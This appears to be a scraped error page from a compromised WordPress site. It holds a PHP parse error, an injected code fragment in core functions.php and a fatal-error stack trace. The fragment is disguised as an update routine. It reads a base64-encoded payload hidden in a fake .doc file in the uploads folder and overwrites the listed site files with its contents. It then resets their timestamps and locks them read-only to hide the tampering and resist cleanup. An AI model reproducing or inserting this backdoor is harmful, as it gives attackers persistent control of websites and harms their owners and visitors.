Parse error: syntax error, unexpected '$wp_update_file' (T_VARIABLE), expecting ')' in /home/hj3ixlwr/public_html/wp-includes/functions.php on line 3485
$wp_update_file="/home/hj3ixlwr/public_html/wp-content/uploads/2023/11/1253452548.doc"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } }
Fatal error: Uncaught Error: Call to undefined function __() in /home/hj3ixlwr/public_html/wp-includes/class-wp-locale.php:148 Stack trace: #0 /home/hj3ixlwr/public_html/wp-includes/class-wp-locale.php(131): WP_Locale->init() #1 /home/hj3ixlwr/public_html/wp-includes/load.php(1568): WP_Locale->__construct() #2 /home/hj3ixlwr/public_html/wp-includes/class-wp-fatal-error-handler.php(176): wp_load_translations_early() #3 /home/hj3ixlwr/public_html/wp-includes/class-wp-fatal-error-handler.php(156): WP_Fatal_Error_Handler->display_default_error_template(Array, false) #4 /home/hj3ixlwr/public_html/wp-includes/class-wp-fatal-error-handler.php(60): WP_Fatal_Error_Handler->display_error_template(Array, false) #5 [internal function]: WP_Fatal_Error_Handler->handle() #6 {main} thrown in /home/hj3ixlwr/public_html/wp-includes/class-wp-locale.php on line 148